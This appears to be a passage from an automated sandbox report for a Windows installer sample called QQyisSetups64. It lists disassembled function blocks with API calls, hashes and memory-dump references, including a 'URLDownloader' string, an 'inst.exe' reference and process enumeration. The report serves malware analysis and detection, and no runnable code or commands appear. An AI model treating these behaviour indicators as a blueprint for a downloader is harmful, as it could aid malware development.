                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 623893373-0
                                                                                                                                                                                                                      • Opcode ID: 06106f8a70e923d91bd8a499f21a0db51f82ea5a22d39d64d7c60a21e5b1a94f
                                                                                                                                                                                                                      • Instruction ID: 8fa48943700a81e2c9b2cfce0a1ddd9ba30b149aeda4daa259b851e8e9bcb32b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06106f8a70e923d91bd8a499f21a0db51f82ea5a22d39d64d7c60a21e5b1a94f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE7138B5C0061DDFEB15DFA4C995AEEB7B5FF08290F104229E416B7299EB306E04CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 1000AEE8
                                                                                                                                                                                                                      • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 1000AF08
                                                                                                                                                                                                                      • _Min_value.LIBCPMTD ref: 1000AF1F
                                                                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000AF33
                                                                                                                                                                                                                      • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 1000AF5F
                                                                                                                                                                                                                      • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 1000AF9D
                                                                                                                                                                                                                      • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 1000AFEE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1591557727-0
                                                                                                                                                                                                                      • Opcode ID: 05a9cec6a7bdc9e916f7dfb027493f280f4e908c6d3ff45262789d5ffb131775
                                                                                                                                                                                                                      • Instruction ID: a7373feddb38768cb8e80fdeb6ca424b68bff663277300cca749af404b47d492
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05a9cec6a7bdc9e916f7dfb027493f280f4e908c6d3ff45262789d5ffb131775
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1551D8B5E00209EFDB04DFA8C984AEEBBB1FF48344F108169E915A7354D730AE95DB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3353612457-0
                                                                                                                                                                                                                      • Opcode ID: 51ffbf4d7ebe4a4557a9ec6990cc1df8eb7d6e0f0daaa4ef435442b776e98115
                                                                                                                                                                                                                      • Instruction ID: 64606688521fabd1402afb0874e896261f6c1f2fbb559040e4c03d6bc464acc4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51ffbf4d7ebe4a4557a9ec6990cc1df8eb7d6e0f0daaa4ef435442b776e98115
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0216B76F00269EEDB21CF56DC41AAF3AA9EB80AD4F014919F8945F210C7B0DD918BE0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B35D
                                                                                                                                                                                                                      • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B36E
                                                                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B379
                                                                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000B3A3
                                                                                                                                                                                                                      • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B3D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4206206407-0
                                                                                                                                                                                                                      • Opcode ID: 6b14a1aa0a869a74d74b41fa1de30e932df37a59437fcad414ebe2ff8be819e4
                                                                                                                                                                                                                      • Instruction ID: f7c15c91105892140f05b25e0fcfcadb8d2072b0e91d30d5794a3d544de0fed2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b14a1aa0a869a74d74b41fa1de30e932df37a59437fcad414ebe2ff8be819e4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E31CEB9D00208ABEB04DFA4D8959AE7B75EF442C0F04C469F8059B24BEB31EE45CB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0286F244
                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 0286F26F
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0286F2A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1083639309-0
                                                                                                                                                                                                                      • Opcode ID: 98de57343e861626075a39aa984df5a9d5828a3fa4c83e5535eac612fe9e42d8
                                                                                                                                                                                                                      • Instruction ID: 27388864ddd74a63ebd521195ef53b643acd31e5b9f6b43ce0746c318b1ee88b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98de57343e861626075a39aa984df5a9d5828a3fa4c83e5535eac612fe9e42d8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B115CBC901218FBDB10EBA0DD8CAAE7778AB59301F108694E60AD7251D734EA54DF90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004037
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 10004074
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004091
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 100040A9
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 100040D7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1216362210-0
                                                                                                                                                                                                                      • Opcode ID: d8278ef5e5963c6c9a9663513e54bc5aa314779fc6fd0523c811705f5206c5ec
                                                                                                                                                                                                                      • Instruction ID: d5d2fc12e147d12df5ef18d66f66630be37a1d65e2a688cbbcfc70e5b1a43c84
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8278ef5e5963c6c9a9663513e54bc5aa314779fc6fd0523c811705f5206c5ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D3152B5F40208BFEB14DF98CC86FAEB7B5EB48710F204254F615AB2C1D671AA50CB65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: dllmain_raw$Main@12
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2964726511-0
                                                                                                                                                                                                                      • Opcode ID: f7f534ad3ff482a18bf34d6bcd0cd3489ad4272e78613ad43f56d35246dc062b
                                                                                                                                                                                                                      • Instruction ID: e08176be8d40a7c85f5adb05ce15c87b5be03c8c0a8884305ab878729c5f0e3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7f534ad3ff482a18bf34d6bcd0cd3489ad4272e78613ad43f56d35246dc062b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C921747E901669AADF219E19CD40A6F7E6AEB84798B054225F81CEB210C731DD81CF91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107DD
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107EA
                                                                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(?,10014F2C), ref: 10010EED
                                                                                                                                                                                                                      • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 10010EFC
                                                                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(?,10014F90), ref: 10010F0A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1722040371-0
                                                                                                                                                                                                                      • Opcode ID: 046d961c1e0df506dca93b3cd0f00a3e9d42ff5419843ba781d4adb65e5c8679
                                                                                                                                                                                                                      • Instruction ID: 6d4aa4042b719817879ad19d1f1f5d821abcde10b660f97fd496c7bb52ecdeee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 046d961c1e0df506dca93b3cd0f00a3e9d42ff5419843ba781d4adb65e5c8679
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8F0BE38D0420DBACB04EAB5EC469DEB7ACEF00290F104530B964AD4E1EFB1F6D58A95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(100172D4,URLDownloader,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000), ref: 1001072A
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(100172D4,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 1001075D
                                                                                                                                                                                                                      • WakeAllConditionVariable.KERNEL32(100172D0,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 10010768
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                                                                                                                                      • String ID: URLDownloader
                                                                                                                                                                                                                      • API String ID: 1466638765-1891997712
                                                                                                                                                                                                                      • Opcode ID: 135d216f9536d5fef4871bc611d23d6ad4692f8f9cf4bb8f7097ed8d31648b84
                                                                                                                                                                                                                      • Instruction ID: 3181bbcb2b9caa1ef0c1f22c926e586b91b1f05f2254f4f57ba8959088f3d27b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 135d216f9536d5fef4871bc611d23d6ad4692f8f9cf4bb8f7097ed8d31648b84
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F0C975900224DFE71ADF58DC88A9577B8FB0D350B018069F909C7322CB34E911CB54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0286FF47: NdrClientCall2.RPCRT4 ref: 0286FF66
                                                                                                                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 0286F16C
                                                                                                                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 0286F179
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeTask$Call2Client
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3085621743-0
                                                                                                                                                                                                                      • Opcode ID: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                                                                      • Instruction ID: d144b95598f01d7cf71f5bdaff15b8026ee57b8986f99e38e747a1526236fb14
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C35104B8D0020DEBCF05CF94D888BFEB7B6BF58308F108149E616A7640D735AA85CB95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 0286400E
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 02864068
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02864080
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 028640CC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                                                                                      • Opcode ID: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
                                                                                                                                                                                                                      • Instruction ID: 0b4b502acff8624c61df70e4b9a485c97e45208924927cf16a8ca1c3cf5678e7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 383134B9E40204BFEB14EF98CC86FAEB7B5EB48710F204254F615AB2C1D671AA10CB55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10011CF6,000000FF,?,1000CB92,?), ref: 1000D350
                                                                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10011CF6,000000FF,?,1000CB92), ref: 1000D36B
                                                                                                                                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,1000CB92,?), ref: 1000D39F
                                                                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 1000D417
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1566052064-0
                                                                                                                                                                                                                      • Opcode ID: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
                                                                                                                                                                                                                      • Instruction ID: 4d9198b2984e5e082309ff7aa8a3130d82e8df6aeec633f907ab193b7f9989e7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79313EB4D00259DFDB04DFA4C895BEEBBB4FF48350F208619E915A3395DB34AA40CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 10010BFD
                                                                                                                                                                                                                        • Part of subcall function 100114A3: InitializeSListHead.KERNEL32(10017318,10010C07,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 100114A8
                                                                                                                                                                                                                      • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012320,10012324,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C16
                                                                                                                                                                                                                      • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012300,1001231C,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C34
                                                                                                                                                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10010C67
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 590286634-0
                                                                                                                                                                                                                      • Opcode ID: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
                                                                                                                                                                                                                      • Instruction ID: 39f7e9c7f58ab3c24a5f1c768587727ae30ebfb406468ad2b612d2fa9f71a151
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D421027A7482129AEB18EBB898027CC37A1EF11364F108205F4C96F1C3DBF1E5C18A96
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 1000CAC0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,1000BEEA,1000CEAD,1000CEAD,6EA14730), ref: 1000CAE4
                                                                                                                                                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(1000CEAD,1000CEAD), ref: 1000BEFC
                                                                                                                                                                                                                      • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000BF1D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@2@D@std@@@std@@$?good@ios_base@std@@?rdbuf@?$basic_ios@?tie@?$basic_ios@V?$basic_ostream@V?$basic_streambuf@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3792166412-0
                                                                                                                                                                                                                      • Opcode ID: b006524d6c5c6b204ea1b1033506b15f97613e5eae7ce8f9a61eeb01e7e64a40
                                                                                                                                                                                                                      • Instruction ID: 6403fa240c7e006dd5772fa615f9af8d9caa538eb968de4636cddec1bc8cd2ef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b006524d6c5c6b204ea1b1033506b15f97613e5eae7ce8f9a61eeb01e7e64a40
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF216D7460064AEFD704CF54C984BAEBBB1FF49344F14C269E8165B391C730E940CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2AD
                                                                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2BA
                                                                                                                                                                                                                      • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2C5
                                                                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2D2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2950233615-0
